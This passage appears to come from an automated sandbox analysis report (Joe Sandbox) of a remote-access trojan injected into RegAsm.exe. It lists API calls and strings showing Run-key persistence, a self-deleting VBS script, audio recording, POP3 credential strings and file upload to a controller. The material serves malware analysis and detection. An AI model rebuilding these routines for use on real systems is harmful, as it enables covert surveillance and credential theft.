                                                                                                                                          • Part of subcall function 0040B8E7: UnhookWindowsHookEx.USER32 ref: 0040B902
                                                                                                                                          • Part of subcall function 0040B8E7: TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                                                                                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,636B1986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D44D
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040D454
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                                                        • String ID: ")$.vbs$8SG$@0O$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$dMG$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("$xpF
                                                                                                                                        • API String ID: 3797177996-2587346478
                                                                                                                                        • Opcode ID: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                                                                                        • Instruction ID: f7f00373e35faeae073ffedb9d5543756e5675edee5c5b567d0d61755fae189b
                                                                                                                                        • Opcode Fuzzy Hash: 9f8aff639c038808ac3b2befcd98474336a74f9fecab3a97dc503a806b773c90
                                                                                                                                        • Instruction Fuzzy Hash: 6181AF716082405AC315FB62D8529AF77A8AFD0308F10483FB58A671E3EF7C9E49C65E
                                                                                                                                        APIs
                                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000000,004750E4,00000003), ref: 004124CF
                                                                                                                                        • ExitProcess.KERNEL32(00000000), ref: 004124DB
                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00412555
                                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 00412564
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041256F
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00412576
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 0041257C
                                                                                                                                        • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                                                                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                                                                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                                                                                                                        • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                                                                                                          • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 004126BD
                                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                                                                                                                        • String ID: .exe$8SG$WDH$exepath$open$temp_
                                                                                                                                        • API String ID: 2649220323-436679193
                                                                                                                                        • Opcode ID: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                                        • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                                                                                                                        • Opcode Fuzzy Hash: 1b3fed83da2aab5ae681b9012af93f6771012d14136d86493a6b51ff35766dc4
                                                                                                                                        • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                                                                                                                        APIs
                                                                                                                                        • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                                                                                                                        • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                                                                                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041B21F
                                                                                                                                        • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                                                                                                                        • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                                                                                                                        • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                                                                                                                        • SetEvent.KERNEL32 ref: 0041B2AA
                                                                                                                                        • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                                                                                                                        • CloseHandle.KERNEL32 ref: 0041B2CB
                                                                                                                                        • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                                                                                                                        • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                                                                                                                        • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                                                                                                                        • API String ID: 738084811-2094122233
                                                                                                                                        • Opcode ID: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                        • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                                                                                                                        • Opcode Fuzzy Hash: d2db031e3b1df8eedd793174f912beb473d8d97f533f0dd4154628810b81d940
                                                                                                                                        • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                                                                        • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                                                                                                                        • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                                                                                                                        • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                                                                                                                        • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                                                                                                                        • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                                                                                                                        • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                                                                                                                        • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                                                                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Write$Create
                                                                                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                                                                                        • API String ID: 1602526932-4212202414
                                                                                                                                        • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                        • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                                                                                                                        • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                                                                                                                        • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000001,00407688,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000003,004076B0,@0O,00407709), ref: 004072BF
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                                                        • API String ID: 1646373207-255920310
                                                                                                                                        • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                        • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                                                                                                                        • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                                                                                                                        • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strlen
                                                                                                                                        • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                                                                                                                                        • API String ID: 4218353326-3023110444
                                                                                                                                        • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                        • Instruction ID: bb93a2ec4ecc4c0c7ac40ef0fbf5621e946fdf476ba73097d2750e43d9e064ca
                                                                                                                                        • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                                                                                                                                        • Instruction Fuzzy Hash: 69612475D04218ABFF11CBE4C851BDEB7F9EF45280F00409AE604A7299EF706A45CF96
                                                                                                                                        APIs
                                                                                                                                        • _wcslen.LIBCMT ref: 0040CE42
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                                                                                                                        • CopyFileW.KERNEL32 ref: 0040CF0B
                                                                                                                                        • _wcslen.LIBCMT ref: 0040CF21
                                                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                                                                                                                        • CopyFileW.KERNEL32 ref: 0040CFBF
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                                                                                                                        • _wcslen.LIBCMT ref: 0040D001
                                                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                                                                                                                        • CloseHandle.KERNEL32 ref: 0040D068
                                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0040D09D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                                                        • String ID: 6$@0O$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$del$open
                                                                                                                                        • API String ID: 1579085052-2469564422
                                                                                                                                        • Opcode ID: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                        • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                                                                                                                        • Opcode Fuzzy Hash: e23ef020428c66d53fd8e3c33b5503753ae814959289fe9288ddeebf21de7c0a
                                                                                                                                        • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                                                                                                                        APIs
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                                                                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                                                                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                                                                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                                                                                                                        • _wcslen.LIBCMT ref: 0041C1CC
                                                                                                                                        • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                                                                                                                        • GetLastError.KERNEL32 ref: 0041C204
                                                                                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                                                                                                                        • GetLastError.KERNEL32 ref: 0041C261
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                                                        • String ID: ?
                                                                                                                                        • API String ID: 3941738427-1684325040
                                                                                                                                        • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                        • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                                                                                                                        • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                                                                                                                        • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.874234704.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.874229194.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.874234704.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_10000000_RegAsm.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strlen
                                                                                                                                        • String ID: %m$~$Gon~$~F@7$~dra
                                                                                                                                        • API String ID: 4218353326-230879103
                                                                                                                                        • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                        • Instruction ID: 2a57ee3bda34e0ca62253b4f9cdd28a92c7aa5ebcaa9e167bfd7dd38749d7a78
                                                                                                                                        • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                                                                                                                                        • Instruction Fuzzy Hash: 9371F5B5D002685BEF11DBB49895BDF7BFCDB05280F104096E644D7246EB74EB85CBA0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$EnvironmentVariable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1464849758-0
                                                                                                                                        • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                        • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                                                                                                                        • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                                                                                                                        • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041C742
                                                                                                                                        • RegEnumKeyExA.ADVAPI32 ref: 0041C786
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041CA50
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnumOpen
                                                                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                                                        • API String ID: 1332880857-3714951968
                                                                                                                                        • Opcode ID: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                        • Instruction ID: 8204223968f620e226549da85b9b34a309c849e8d9bbed411749b7727356edba
                                                                                                                                        • Opcode Fuzzy Hash: bda5a057d1482af4b316a8033d0568fb74c7f5fd769d604243e8b29cd9515908
                                                                                                                                        • Instruction Fuzzy Hash: 3E8133311082459BC325EF11D851EEFB7E8BF94309F10492FB589921A2FF74AE49CA5A
                                                                                                                                        APIs
                                                                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                                                                                                                        • GetCursorPos.USER32(?), ref: 0041D67A
                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 0041D683
                                                                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                                                                                                                        • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                                                                                                                        • ExitProcess.KERNEL32 ref: 0041D6F6
                                                                                                                                        • CreatePopupMenu.USER32 ref: 0041D6FC
                                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                                                        • String ID: Close
                                                                                                                                        • API String ID: 1657328048-3535843008
                                                                                                                                        • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                        • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                                                                                                                        • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                                                                                                                        • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$Info
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2509303402-0
                                                                                                                                        • Opcode ID: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                        • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                                                                                                                        • Opcode Fuzzy Hash: 265d55c29888f35ec20f5081f159e7cd252a50d65c59893da787bb4e51b2451e
                                                                                                                                        • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                                                                                                                        APIs
                                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00408D1E
                                                                                                                                        • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                                                                                                                        • __aulldiv.LIBCMT ref: 00408D88
                                                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408FE9
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00409037
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000009.00000002.873424505.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                                                                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $NG
                                                                                                                                        • API String ID: 3086580692-2582957567
                                                                                                                                        • Opcode ID: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
                                                                                                                                        • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                                                                                                                        • Opcode Fuzzy Hash: 3991cb73806a49c5ac684c1e5fded63b8ae94927034fce3271c358c0f33b2713
